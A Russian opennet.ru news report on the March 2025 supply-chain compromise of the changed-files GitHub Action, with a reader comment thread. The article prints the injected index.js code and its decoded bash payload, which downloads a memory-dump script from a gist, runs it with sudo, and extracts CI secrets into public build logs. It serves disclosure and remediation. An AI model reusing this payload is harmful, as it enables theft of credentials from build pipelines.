Компрометация GitHub Actions-обработчика changed-files, применяемого в 23 тысячах репозиториях

15.03.2025 14:25

Выявлена подстановка вредоносного изменения в репозиторий проекта changed-files, развивающего обработчик к системе GitHub Actions, позволяющей автоматически запускать сценарии сборки и тестирования кодовых баз при срабатывании определённых событий, таких как поступление push-запроса, создание релизов, открытие/закрытие issue и открытие/закрытие pull-запросов. Обработчик changed-files использовался в 23 тысячах репозиториях, применяющих GitHub Actions в инфраструктуре непрерывной интеграции, для отслеживания изменения файлов и каталогов.

В репозиторий changed-files было подставлено изменение 0e58ed8, добавляющее в файл index.js вредоносный код под предлогом переработки работы с файлами блокировок. При выполнении обработчика changed-files вредоносная вставка собирала присутствующие в сборочном окружении ключи доступа и прочие конфиденциальные данные. В качестве канала для передачи информации за пределы сборочного окружения использовался вывод записей в сборочный лог, который не в приватных репозиториях доступен публично.

Всем разработчикам, пользовавшимся changed-files, требуется незамедлительно провести аудит своей инфраструктуры и проверить публичные логи систем интеграции на базе GitHub Actions на предмет утечки конфиденциальных данных. В случае использования скомпрометированной версии рекомендуется поменять ключи и провести анализ возможной компрометации своих систем. В настоящее время GitHub уже заблокировал репозиторий changed-files, но до этого около 14 часов вредоносные обновления были доступны для загрузки. Понять наличие вредоносного изменения можно по упоминанию "bash" в файле index.js:


   async function updateFeatures(token) {
   
       const {stdout, stderr} = await exec.getExecOutput('bash', ['-c', `echo "aWYgW1sgIiRPU1...ApmaQo=" | base64 -d > /tmp/run.sh && bash /tmp/run.sh`], {
           ignoreReturnCode: true,
           silent: true
       });
       core.info(stdout);
   }

В base64-последовательности содержался код:

   if [[ "$OSTYPE" == "linux-gnu" ]]; then
     B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo  python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
     echo $B64_BLOB
   else
     exit 0
   fi

Коммит был размещён от имени бота "renovate[bot]", предназначенного для автоматизации операций по обновлению зависимостей, но скорее всего имя данного бота использовано для запутывания следов, так как коммит был помечен как неверифицированный и не принадлежащий ни к одной ветке в репозитории changed-files. Подобные коммиты могут свидетельствовать о добавлении не в основной репозиторий, а в его форк (при прямом обращении через основной репозиторий в GitHub коммиты из форков остаются видимыми).

Примечательно, что атакующий добился добавления вредоносного коммита почти во все git-тэги и релизы проекта changed-files, без отображения в git-логе коммитов в соответствующих ветках. В качестве предположений как он мог этого добиться упоминалось создание форка репозитория, размещения в нём вредоносного кода и обновления всех тегов в родительском репозитории с учётом нового SHA-хэша форка. По предположению другого разработчика атакующий добавил коммит в ветку main, перенаправил все теги на данную ветку, после чего откатил ветку main на предыдущий коммит.

исправить +10 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/62892-github

Ключевые слова: github, action

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (39)

1.1, нейм (?), 15:44, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	–4 +/–
> nikitastupin наш слон базовичок дискредитирует американский гитхаб?

2.8, Аноним (8), 16:19, 15/03/2025 [^] [^^] [^^^] [ответить]	–9 +/–
Прошу прощения, уточните пожалуйста, а “ваш” это чей будет? Мексика, Канада, Дания… Еврозоюз? Какая-то из стран восточной Европы, граждани которой имею претензии к 🇺🇸 ?

3.10, Анонем (?), 16:37, 15/03/2025 [^] [^^] [^^^] [ответить]	+7 +/–
> Всем привет! Я Никита Ступин, специалист по информационной безопасности Почты Mail.Ru. Не так давно я провел исследование уязвимостей мобильного OAuth 2.0. Для создания безопасной схемы мобильного OAuth 2.0 мало реализовать стандарт в чистом виде и проверять redirect_uri. Необходимо учитывать специфику мобильных приложений и применять дополнительные механизмы защиты. Мексика, да

3.19, Аноним (19), 19:08, 15/03/2025 [^] [^^] [^^^] [ответить]	+2 +/–
Китаец Ni Kita Stu Pin.

4.24, Похожий (?), 19:50, 15/03/2025 [^] [^^] [^^^] [ответить]	+/–
На филиппинский похоже. Сравните, всемирно известный хит: Bakit Nga Ba Mahal Kita

3.30, cheburnator9000 (ok), 02:26, 16/03/2025 [^] [^^] [^^^] [ответить]	+/–
Их имеется в виду часть граждан РФ сочувствующих кремлю.

1.2, нах. (?), 15:56, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
Молодец, Никитос, надеюсь, товарищмаёр довольны и уже представили себя к госнаградам. P.S. отдельно доставляет что "знающие гит" девляпсы без понятия как ты этого добился - так что можем повторить!

2.4, Аноним (8), 16:12, 15/03/2025 [^] [^^] [^^^] [ответить]	+/–
А в гитхаб профиле у него звание, адрес места “службы” , герб и прапор страны? > Штирлиц брёл по улицам тихого немецкого городка. "Ничто не выдавало в нём советского разведчика — разве что волочившийся сзади парашют да ушанка с красной звездой могли привлечь к нему внимание случайного прохожего"

2.15, bonifatium (?), 17:17, 15/03/2025 [^] [^^] [^^^] [ответить]	+/–
Никитос - просто автор дампилки памяти, которой воспользовался злоумышленник

2.16, Аноним (16), 17:26, 15/03/2025 [^] [^^] [^^^] [ответить]	+/–
А Никитоса к Статье 272

3.23, Аноним (23), 19:44, 15/03/2025 [^] [^^] [^^^] [ответить]	–2 +/–
Никтос-то тут причём? Я о нём слышал как минимум с 2018 года, легитимный ресёрчер. Вернее не совсем: на Huawei он работал. Ну раз ему так КНР мила - вот пусть туда на ПМЖ и едет. И о соц. "кредитном рейтинге" пусть обеспокоиться не забудет.

4.27, Аноним (27), 20:52, 15/03/2025 [^] [^^] [^^^] [ответить]	–2 +/–
Вы видели Китайский Дэвушка? Прекрасен что фарфоровая кукла! i.postimg.cc/rqfNMc6h/1sppnfy.jpg i.postimg.cc/wqLNyYPY/1uy22sc.jpg

1.3, Tron is Whistling (?), 15:58, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
Лол, опять пострадали только те, кто тянул в рот всё самое неизвестное.

1.5, freehck (ok), 16:13, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]

+5 +/–

> Подобные коммиты могут свидетельствовать о добавлении не в основной репозиторий, а в его форк (при прямом обращении через основной репозиторий в GitHub коммиты из форков остаются видимыми).

O_O

Ничего себе! То есть человек может сделать форк моего проекта, закоммитить туда объект, а затем скачивать его "типа из моего проекта"?

> Примечательно, что атакующий добился добавления вредоносного коммита почти во все git-тэги и релизы проекта changed-files, без отображения в git-логе коммитов в соответствующих ветках.

Снимаю шляпу. Талантливый парень.

2.25, Мимоним (?), 19:53, 15/03/2025 [^] [^^] [^^^] [ответить]	+/–
> GitHub в целях оптимизации и исключения дубликатов хранит вместе все объекты из основного репозитория и форков, лишь логически разделяя принадлежность коммитов. отсюда https://www.opennet.ru/opennews/art.shtml?num=61605

3.31, Аноним (31), 02:39, 16/03/2025 [^] [^^] [^^^] [ответить]	+/–
Сама концепция гита - ущербна. Пытался я как то небольшой репорт отправить, мне сказали, - сделайте форк нашего проекта к себе(!), - сделайте исправление кода у себя в форке, - пришлите нам ваши изменения в вашем форке и мы подумаем принимать ли. А я хотел им тупо на ошибку указать в одном месте. Ну то весь гитхаб это есть форк форка и форком погоняет. и мне без разницы сколько раз они хранят код, тысячу или один (прописывая реляции между проектами).

4.33, Аноним (-), 11:53, 16/03/2025 [^] [^^] [^^^] [ответить]

+3 +/–

> А я хотел им тупо на ошибку указать в одном месте.

Git вообще изначально - инструмент для разработчиков. Всякие багтрекеры и проч - весьма опциональный довесок, который как таковой не часть гита.

Более того - разработчикам довольно часто не интересна информация о ошибках в чем либо кроме самой последней версии в максимально свежем состоянии. Потому что возможно они уже починили это полгода назад. Поскольку это ваша проблема - вам и разбираться как и что. Если оно вам надо. Не надо - окей, но это ВАША проблема. Свои - разработчики как правило починят сами.

А секрет прост: время разработчиков не резиновое. Вы либо подыгрываете по максимуму, экономя их время, и к вам одно отношение. Или нет - тогда отношение может быть и другое. Весьма зависит от команды и доступных им ресурсов.

Git сам по себе - к багрепортам вообще ортогонален, внезапно.

5.38, нах. (?), 13:55, 16/03/2025 [^] [^^] [^^^] [ответить]

+/–

> А секрет прост: время разработчиков не резиновое.

а мое - резиновое? Напоминаю - там человек ошибку нашел. Не свою.

> Вы либо подыгрываете по максимуму, экономя их время

им и так сэкономили дофига времени, ткнув носом в ошибку.

> Весьма зависит от команды и доступных им ресурсов.

в целом, если кому-то недостаточно issue и требуют чего-то еще - надо от этой команды и ее продукта просто держаться подальше.
Ты им и так бесплатным преальфатестером (судя по качеству кода, позволяющему кому-то в первый раз с ним встретившимся ткнуть в ошибку) поработал. Делать за них остальную их работу - какая-то совершенно неэффективная бизнес-стратегия.

> окей, но это ВАША проблема

нет, это проблема в их софте. Я ее решу выбрасыванием недоделка в помойку, а не вылизыванием всяких мест разработчику-криворучке.

А если уж создам форк - то это будет - форк. И тут уже разработчики-криворучки пусть приходят и клянчат. Ну или разбираются в собственном лапшекоде заново и ищут что я там понаисправлял (причем чтоб им не мешать - мы так не договаривались)

6.40, Аноним (40), 14:08, 16/03/2025 [^] [^^] [^^^] [ответить]	+/–
> нет, это проблема в их софте. ну так не пользуйся их софтом, напиши свой... ой, что с лицом?

6.41, Аноним (41), 15:57, 16/03/2025 [^] [^^] [^^^] [ответить]	+/–
Это твои проблемы Баг же - у тебя Как ты понимаешь, явные баги долбавшие во... большой текст свёрнут, показать

7.47, пох. (?), 00:18, 17/03/2025 [^] [^^] [^^^] [ответить]

+/–

> Как ты понимаешь, явные баги долбавшие вот именно разработчиков,
> в их конфигах - долго не живут.

еще как живут. Годами.
(достаточно вспомнить баг который разработчики net/3 "ловили всем аулом" ГООООД - а там не какие-то мелочи, там kernel panic был)

> Вы и правда ни о чем не договаривались. Но при сильной двиергенции форка от апстрима
> работенки подвалит почему-то таки - тебе :)

от криворучек не желающих признавать собственные ошибки и исправлять их - не подвалит.

4.48, myster (ok), 08:58, 17/03/2025 [^] [^^] [^^^] [ответить]

+/–

> Сама концепция гита - ущербна.

GitHub не Git

> Пытался я как то небольшой репорт отправить, мне сказали,
> - сделайте форк нашего проекта к себе(!),
> - сделайте исправление кода у себя в форке,
> - пришлите нам ваши изменения в вашем форке и мы подумаем принимать ли.

этот набор действий означает просто PR (Pull Request), просто вам расписали подробно, вдруг вы новичек и не знаете? Cоздавать форки у себя абсолютно нормально, а вот когда в основном репозитории разрешают гадить и плодить ветки это ненормально, это нужно делать в форках. Более оптимального способа отправить PR нет, если вам, кажется, что можно сделать ещё проще, то как?

> А я хотел им тупо на ошибку указать в одном месте.

Тогда просто пишите ошибку в Issues, если вас просят создать ещё и PR, это не обязывает вас его создавать, вас просто побуждают сделать хороший поступок, это примерно, как, когда человек убирает поднос с объедками за собой в общественной забегаловке, а не взваливает эту ношу на персонал, хотя персонал всё равно это сдлеает, это им надо и это их работа.

1.7, Аноним (7), 16:15, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	+6 +/–
> Подобные коммиты могут свидетельствовать о добавлении не в основной репозиторий То-есть мерзкософт с своими типа-ништяками - довел инфраструктуру до состояния когда даже не знает откуда им прилетело? И эти люди лезут учить других на тему supply chain с своими 2FA?

2.34, Аноним (31), 13:44, 16/03/2025 Скрыто ботом-модератором [к модератору]	–2 +/–

3.42, Аноним (42), 16:04, 16/03/2025 Скрыто ботом-модератором [к модератору]	+/–

2.39, нах. (?), 13:57, 16/03/2025 [^] [^^] [^^^] [ответить]

+/–

да-да, это ж они написали р-опую vcs в которой подмена истории не катастрофа с записью во все логи, а рутинная операция. Ой, нет. Ее б-жок с пальцем наляпал задней левой ногой.

Ему не жмет, у него на локалхосте никто форсед пуш кроме него не сделает.

А что вы жрете с лопаты любой навоз лишь бы забесплатно - тоже корпорация зла виновата.

3.43, Аноним (42), 16:07, 16/03/2025 [^] [^^] [^^^] [ответить]

+/–

> да-да, это ж они написали р-опую vcs в которой подмена истории не
> катастрофа с записью во все логи, а рутинная операция. Ой, нет.
> Ее б-жок с пальцем наляпал задней левой ногой.

В этой DVCS самой по себе всего вон того - вообще нет. Факапище чисто в майкрософтовском обесе :D. Тут совсем не отмажешься.

> Ему не жмет, у него на локалхосте никто форсед пуш кроме него не сделает.

Зато у майкрософт индусы которые сперва накодят ништяков - потом с удивлением узнают что оказывается эвон как можно было. Где были пм и архитекты кхе-кхе "решения" мы вообще тактично помолчим. Видимо - еще чистили индийский сортир, а i++ итерация собеса только через недельку.

> А что вы жрете с лопаты любой навоз лишь бы забесплатно -
> тоже корпорация зла виновата.

Вот не надо грязи в женской бане, я уже забыл кренделя на гитхап. Так что не жру.

4.46, нах. (?), 20:28, 16/03/2025 [^] [^^] [^^^] [ответить]

+1 +/–

> В этой DVCS самой по себе всего вон того - вообще нет.

А в ней своего вообще ничего нет. Поделка для локалхоста с подделкой историй, ни авторизации, ни логинга, ни разделения прав, нихрена. Потому что подельщик не умел и не хотел учиться.

И исправить ничего не получится, хоть microsoft, хоть архангел Гавриил - потому шта савместимасть.

> Вот не надо грязи в женской бане, я уже забыл кренделя на гитхап. Так что не жру.

так твой код и не нужен никому.

1.9, Аноним (8), 16:26, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	+/–
> Ничего себе! То есть человек может сделать форк моего проекта, закоммитить туда объект, а затем скачивать его "типа из моего проекта"? да, это называется Open Sources, т.е. программное обеспечение с открытым исходным кодом, а гитхаб продемонстрировал беспрецедентную открытость!

1.12, 12yoexpert (ok), 16:50, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	+/–
какому идиоту в принципе пришло в голову использовать js на сервере? электричество бесплатное?

2.17, Аноним (16), 17:33, 15/03/2025 [^] [^^] [^^^] [ответить]	+/–
Когда создавался GitHub (тот ещё первозданный, настоящий) ещё не модно было.

2.35, Аноним (31), 13:47, 16/03/2025 [^] [^^] [^^^] [ответить]	+/–
Хочешь подскажу одну завирусованную помойку с js на стороне сервера? (SJedoN)

1.21, Аноним (23), 19:21, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Пофиг, third party (не от самого гитхаба и не от себя, любимого) Github Actions обычно по тегам гвоздями прибивают (это если не делать свой форк). Как раз от такого.

2.26, Аноним (26), 20:17, 15/03/2025 [^] [^^] [^^^] [ответить]	+/–
Тэги перебиваются на раз-два, git push —tags —force

3.36, Аноним (31), 13:47, 16/03/2025 [^] [^^] [^^^] [ответить]	+1 +/–
Нет тегов - нет уязвимости! (мем с умным негром.)

1.22, Аноним (23), 19:41, 15/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	+/–
>\{"value":"[^"]*","isSecret":true\}' Молодцы, GitHub, все секреты промаркировали в JSON, чтобы их удобнее извлекать было.

2.37, Аноним (31), 13:49, 16/03/2025 [^] [^^] [^^^] [ответить]	+/–
Как уже сказали чуть выше - там погромист особо "одаренный".

1.45, Аноним (45), 20:02, 16/03/2025 [ответить] [﹢﹢﹢] [ · · · ]

+1 +/–

Извините, но я не понял вот эту часть

> и обновления всех тегов в родительском репозитории с учётом нового SHA-хэша форка.

Понятно, что он сделал форк и залил туда вирьё. Но как он обновил тэги в основном репе? У тебя же должен быть доступ, чтоб запушить или сменить тэги.

1.49, Аноним (49), 10:05, 17/03/2025 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Не мешайте работе анебе!

игнорирование участников | лог модерирования

Добавить комментарий

Текст: